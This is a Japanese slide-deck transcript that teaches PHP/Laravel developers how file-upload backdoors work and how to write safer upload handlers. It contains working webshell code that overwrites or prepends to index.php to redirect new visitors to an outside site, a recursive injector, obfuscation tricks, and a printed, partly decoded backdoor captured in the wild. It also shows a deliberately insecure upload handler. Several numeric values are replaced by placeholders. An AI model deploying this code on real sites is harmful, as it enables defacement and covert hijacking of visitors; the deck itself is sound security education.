
作って理解するバックドア

Roku
March 23, 2023

 作って理解するバックドア

Roku

March 23, 2023



Transcript

 1. 実演 • 悪い人がファイルがこんなファイルをアップロードしました。
 
 rewrite index.php <?php $path = __DIR__

  . '/../../../public/index.php'; $code = "<?php die('you have been hacked :)');"; file_put_contents($path, $code); die('success');
 2. 攻撃用ファイルいろいろ • もっとタチ悪いやつ。 <?php $path = __DIR__ . '/../../../public/index.php'; $code

  = "<?php header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');
 3. さっきのサンプル <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

  header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');
 4. さっきのサンプル <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

   header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success'); こんな改ざんならまだマシ。
 5. グレードアップ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

  { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code);
 6. グレードアップ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

   { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code); 管理者や開発者が気づかないうちに、新規訪問者だけが飛ばされ続ける。
 7. glob を使って総当たり <?php function prepend($path) { $code .= file_get_contents($path, “…攻撃用コード…”);

  file_put_contents($path, $code); } function prependRecursive($path) { if (file_exists("{$path}/index.php")) { prepend("{$path}/index.php"); } foreach (glob("{$path}/*") as $child) { if (is_dir($child)) { prependRecursive($child); } } } prependRecursive($_SERVER["DOCUMENT_ROOT"]);
 8. 例えばこのコード <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

  header('Location: https://ad5.jp');"; file_put_contents($path, $code);
 9. こうして <?php eval("$path = __DIR__ . '/../../../public/index.php'; $code = \"<?php

  header('Location: https://ad5.jp'); \";file_put_contents($path, $code)");
 10. PHPさんは柔軟なんです。 <?php $x = '0123456789abcdefghijklmnopqrstuvwxyz_'; $a = $x[14].$x[31].$x[10].$x[21]; $b =

  $x[11].$x[10].$x[28].$x[14].$x[6].$x[4].$x[36]. $x[13].$x[14].$x[12].$x[24].$x[13].$x[14]; $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy gkcGF0aCwgJGNvZGUp"));
 11. ※お断り • 先程のコードは1点嘘があります。
 eval は関数ではなく言語構造のため、
 
 
 は動きません。 •

   実際の[数値欠落]段目の難読化には、
 create_function 関数 PHP[数値欠落] が使われているものが
 多く見られました。 $a = "eval"; $a();
 12. 実際に採集したバックドア locale.php ※約[数値欠落] byte <?php $tJvyYsXGpmgwi='y(3;]whcx)8$4mb dk1qog5sprlua=z_/ 0i9tvf_”76*.2n[je';$q2866=$tJvyYsXGpmgwi[(105/15)]. $tJvyYsXGpmgwi[(26-1)].$tJvyYsXGpmgwi[(1*49)]. $tJvyYsXGpmgwi[((10*1)+18)].$tJvyYsXGpmgwi[(14+22)].

  $tJvyYsXGpmgwi[(44+5)].$tJvyYsXGpmgwi[(44-13)].$tJvyYsXGpmgwi[(684/18)]. $tJvyYsXGpmgwi[(23+4)].$tJvyYsXGpmgwi[(72-(33-7))]. $tJvyYsXGpmgwi[(154/22)].$tJvyYsXGpmgwi[(11+25)].$tJvyYsXGpmgwi[(65- (62-31))].$tJvyYsXGpmgwi[(26-6)].$tJvyYsXGpmgwi[((27*2)-8)]; $pHFdNhg9688=$tJvyYsXGpmgwi[(20-9)].$tJvyYsXGpmgwi[(2*4)]. $tJvyYsXGpmgwi[(29*1)].$tJvyYsXGpmgwi[(160/4)]; $MYtraky2482=$tJvyYsXGpmgwi[(8*5)].$tJvyYsXGpmgwi[((1+0)+2)]. $tJvyYsXGpmgwi[(6+(1*(95/19)))].$tJvyYsXGpmgwi[(140/5)]. $tJvyYsXGpmgwi[(522/18)].$tJvyYsXGpmgwi[(7*((7-3)-2))]. …ུ…
 13. decodeすると。 <?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss.xml'; $dt =

  0; $sitemap_file = 'sitemap'; $mapnum = 2000; if(isset($_GET['dt'])){ $dt = $_GET['dt']; } $site = @$_GET['smsite']; $jdir = ''; $http_web = 'http'; if(is_https()){ $http = 'https'; }else{ …ུ…
 14. locale.php の特徴 • Google に偽のサイトマップ等を送っている。
 →SearchConsole や検索結果のアラートにより、
 　運営者やユーザに気づかれるのを防ぐため。 • CSS や画像等の入ったディレクトリを狙っている。 •

   ファイルに書き込む内容を外部URLから取得している。
 →おそらく攻撃者の司令用サーバ。この内容を変更することで
 　攻撃用ファイルを変更せずとも、攻撃内容を変えられる。
 15. 実演に使用したお問い合わせフォーム public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

  $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); chmod($saving_path, 0755); $data['file_name'] = $_FILES['file']['name']; $data['file_url'] = url('storage/', $_FILES['file']['name']); session()->put('inquiry', $data); return redirect()->route('confirm'); }
 16. じゃあ、これは安全ですか？ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

  $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
 17. じゃあ、これは安全ですか？ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

   $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //略 } 結論から言えば、ほとんどの条件下ではセーフです。何故セーフなのか、どういう条件下で危険なのか、答えられますか？
 18. じゃあこれはどうなのか？ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

  $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
 19. じゃあこれはどうなのか？ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

   $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //略 } デフォルトでは、php ファイルをアップロードした場合、拡張子なしになる。
 20. UploadedFile::store の実装 UploadedFile::hashName によりファイル名が決定される。
 拡張子は、File::guessExtension によって決められる。
 PHP ファイルをアップロードした場合、MimeType は


   text/x-php となり、MimeTypes::MAP の定義に従い、
 拡張子なしで格納される。 UploadedFile…Illuminate\Http\UploadedFile
 File…Symfony\Component\HttpFoundation\File\File
 MimeTypes…Symfony\Component\Mime\MimeTypes
 21. こんな実装も、やりがち。 public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

   $request->file(‘file'); $filename = Carbon::now()->format(‘Ymd_His.') . $uploaded_file->getClientOriginalExtension(); $path = $uploaded_file->storePubliclyAs('upload', $filename , ['disk' => 'public']); //略 } ファイル名に日付やID等のルールを持たせて保存する場合。 getClientOriginalExtension より guessExtension
 22. じゃあこれはどうなのか？ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

  $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
 23. UploadedFile::store の実装 ソースコードリーディングは割愛しますが・・・ 設定ファイル config/filesystems.php
 の disks.public.permissions の設定に依存します。

   デフォルトでは、ディレクトリは[数値欠落]または[数値欠落]に、
 ファイルは[数値欠落]または[数値欠落]になっています。 →この設定を変更していない限りは、
 　前述のコードはパーミッション[数値欠落]になります。
 24. ちなみにこの場合 public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

   $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); //略 } パーミッションはどうなるか、答えられますか？
 25. file_put_contents 等のパーミッション • OS の設定（umask）に依存します。
 多くの環境では、ディレクトリは [数値欠落]または[数値欠落] 、
 ファイルは

   [数値欠落]または[数値欠落] です。 • OS の設定にも依存すべきではなく、アプリケーション内で
 明示的に対処すべきです。